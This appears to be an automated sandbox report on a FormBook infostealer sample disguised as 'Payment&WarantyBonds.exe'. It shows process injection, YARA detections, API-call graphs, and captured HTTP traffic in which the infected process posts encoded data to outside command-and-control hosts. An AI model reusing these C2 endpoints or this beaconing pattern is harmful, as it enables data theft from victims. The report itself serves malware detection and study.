                                                                                                                                                                              Data Ascii: ZT=Nam/DfWW7P9HaKxH0tTDCwlMrXEC/Mton4jh6b1hz1pJRRG80lcFdNAwmcFFj1taJftlE1M48np36NNpy1WTxhmmd1kCtj8D0jgW41c2okXADP/ip6Ikn8sVpLCTN6Y/7IGmZjQ5vA1Nh11Ueqcvn5lZqo2ndpUFLaC2zyz1oBnA8YHho3+RiID9vMw+IlfyZA==
Oct 30, 2024 08:13:25.346431971 CET | 833 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:25 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUHwzHeeaK07BdDXGPgYn90TIdEYVBR1SAV6wEUL1lI8%2BYb6S%2BVcop685tmmlSSj0FiGcF0GeDsMYjQOXsPNOMStMs1TtT0VOgf3VxI7t%2FJTq7zBCJ7t08DLuf1CCQQEWTDnbncWcGWNQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1478&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 50053 | 34.92.128.59 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:13:26.942014933 CET | 739 | OUT | POST /33ib/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.sgland06.online
                                                                                                                                                                              Referer: http://www.sgland06.online/33ib/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=Nam/DfWW7P9HbqhHncTDVgk+l3ECxstsn4vh6eVxzmdJI0681n4FTtAws8FAtVtRJfRDExM48nt36N9puS6UwxmkWVkAnD8D0jgW4x0YonnAC/vivrIj5ssWjrCTJ6Y77IGEZnZSvCNNh3tUebcsu5lf0Y21XK59Tb/V9krAnyLBw+K75GfGwInOyL5KFmi7CO2K61YWj88E9ZL5kfxVJcw=
Oct 30, 2024 08:13:28.198921919 CET | 839 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:27 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F1Qp0ukKMEeQgs6o%2BwXck7xNYyZcumSwOAJJD84Cj7dF87XdMaCrjGWrYvj9I1MLqY%2FAvcs4d6H8GJZADfCa8Wq5RxkTIsXxXIQqQWFHDY%2FYEnghqv%2FSdyaSNi5bxCMfdQlmsGO%2FzaVmGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 50054 | 34.92.128.59 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:13:29.499329090 CET | 10821 | OUT | POST /33ib/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.sgland06.online
                                                                                                                                                                              Referer: http://www.sgland06.online/33ib/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:13:30.466429949 CET | 842 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:30 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7YCUGYchLbJXV%2FJMALRkbPKPygHb%2B2S6JqxaAviQJta1hjsQXmpeKvh65zoEcqumyG5DAZ1QD4k6R1bTTlbGapU%2BK%2F72Hk2jcXlwci3puO1qEYR5NiIEcWJcMk%2B13NCbB%2FpjBUbxiv1Hog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1408&sent=1&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10841&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              48 | 192.168.2.4 | 50055 | 34.92.128.59 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:13:32.039005041 CET | 448 | OUT | GET /33ib/?ZT=AYOfApeu9cghctp2i/KTSy5LkW4tz9x7+arej5d+r0NkQieZykYOddwLhoh5ni50J8Z5WiAS8Adn1ZwJ2laV/jmSd394ohUQohZCg1IJ+kicD56x/bghldI=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:13:32.998105049 CET | 846 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:32 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouUuSoRynzFb31XBRZ2NbLSS0T1agnkjrQ8iKzVwb2%2FXJVMwe4j1yptinmvoxDWI960JcFPZlCnFdzpt%2Fr6jJDHeebcMa07RucPBdwvXO30T3NJu5Jwyf8UPm%2BgwGEeCvp941JjH4M9fGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1399&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=468&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              49 | 192.168.2.4 | 50056 | 152.42.255.48 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:13:38.229788065 CET | 713 | OUT | POST /jr4j/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.extrime1.shop
                                                                                                                                                                              Referer: http://www.extrime1.shop/jr4j/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=ysv3milyC13BonqJ0v8tFhPlhXeHjclmDKf7GB/4yNdPWQJBy7zo2Qvxm/8On+mRQQ1AsMygxFB8Y2Mf1rsDvgNT8nxxm96ngidsIBKdycFeWBsv7v728xnzaKJFqbXdacja5SN+aj5KelXw/7mjdM3XPhZBMIV9XR/TuJ8PiEzl96k4A/vZoTcsWifb5jU8Ng==
                                                                                                                                                                              Oct 30, 2024 08:13:39.234744072 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:39 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              50 | 192.168.2.4 | 50057 | 152.42.255.48 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:13:40.799501896 CET | 733 | OUT | POST /jr4j/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.extrime1.shop
                                                                                                                                                                              Referer: http://www.extrime1.shop/jr4j/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=ysv3milyC13B53aJ2MUtCBPm4neHt8liDKD7GFPoy+5PW11B15LomAvxtf9E4OmYQQJIsJSgxFF8Y38f2asEpgNR0Hx3rd6ngidsIB27ycdeWwcvpdT5jBnwSqJFubWUaciP5ThUagRKenfw/JOkGc3RSRY4J685ewzcvIcUvQCGxcpiROOO6T4fLlWv0gp1Wlt8xHsWI/Ymdr1/C+2s57A=
                                                                                                                                                                              Oct 30, 2024 08:13:41.790015936 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:41 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              51 | 192.168.2.4 | 50058 | 152.42.255.48 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:13:43.354258060 CET | 10815 | OUT | POST /jr4j/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.extrime1.shop
                                                                                                                                                                              Referer: http://www.extrime1.shop/jr4j/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT= [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:13:44.345587969 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:44 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              52 | 192.168.2.4 | 50059 | 152.42.255.48 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:13:45.896469116 CET | 446 | OUT | GET /jr4j/?ZT=/uHXlXwxCWKagG2f+cMqJk/ouEnshdx+b5P4XSvx6MlJZzR/8pbZgxPfuPQh+b7XVC9rmLmVxzweaBtr7+wSxihG8Hktp9qijzhrRRKR+f0leSIT4/3X8Bo=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:13:46.886544943 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:46 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:03:09:40
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\Payment&WarantyBonds.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                                                                                                                                                                              Imagebase:0x640000
                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                              MD5 hash:A9DA1B42F6AD80EE6085F69E6C25F49B
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:03:09:46
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\Payment&WarantyBonds.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                                                                                                                                                                              Imagebase:0x950000
                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                              MD5 hash:A9DA1B42F6AD80EE6085F69E6C25F49B
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2063986251.0000000001740000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2064136057.00000000021E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:6
                                                                                                                                                                              Start time:03:10:10
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe"
                                                                                                                                                                              Imagebase:0xa00000
                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4148377228.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:03:10:12
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\systeminfo.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\systeminfo.exe"
                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                              File size:76'800 bytes
                                                                                                                                                                              MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4148413603.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4148359872.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:8
                                                                                                                                                                              Start time:03:10:25
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe"
                                                                                                                                                                              Imagebase:0xa00000
                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4150364860.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:03:10:38
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:10.5%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:1.4%
                                                                                                                                                                                Total number of Nodes:219
                                                                                                                                                                                Total number of Limit Nodes:10
APIs
• NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 0730638F
Memory Dump Source
• Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID:
• API String ID: 1778838933-0

Control-flow Graph

control_flow_graph 297 284d411-284d4af GetCurrentProcess 301 284d4b1-284d4b7 297->301 302 284d4b8-284d4ec GetCurrentThread 297->302 301->302 303 284d4f5-284d529 GetCurrentProcess 302->303 304 284d4ee-284d4f4 302->304 305 284d532-284d54d call 284d5f0 303->305 306 284d52b-284d531 303->306 304->303 310 284d553-284d582 GetCurrentThreadId 305->310 306->305 311 284d584-284d58a 310->311 312 284d58b-284d5ed 310->312 311->312
APIs
• GetCurrentProcess.KERNEL32 ref: 0284D49E
• GetCurrentThread.KERNEL32 ref: 0284D4DB
• GetCurrentProcess.KERNEL32 ref: 0284D518
• GetCurrentThreadId.KERNEL32 ref: 0284D571
Memory Dump Source
• Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0

Control-flow Graph

control_flow_graph 319 284d420-284d4af GetCurrentProcess 323 284d4b1-284d4b7 319->323 324 284d4b8-284d4ec GetCurrentThread 319->324 323->324 325 284d4f5-284d529 GetCurrentProcess 324->325 326 284d4ee-284d4f4 324->326 327 284d532-284d54d call 284d5f0 325->327 328 284d52b-284d531 325->328 326->325 332 284d553-284d582 GetCurrentThreadId 327->332 328->327 333 284d584-284d58a 332->333 334 284d58b-284d5ed 332->334 333->334
APIs
• GetCurrentProcess.KERNEL32 ref: 0284D49E
• GetCurrentThread.KERNEL32 ref: 0284D4DB
• GetCurrentProcess.KERNEL32 ref: 0284D518
• GetCurrentThreadId.KERNEL32 ref: 0284D571
Memory Dump Source
• Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
Similarity
                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2063062207-0

                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B153B16
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 963392458-0

                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B153B16
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 963392458-0

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0284AFDE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4139908857-0

                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 028459C9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2289755597-0

                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 028459C9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2289755597-0

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
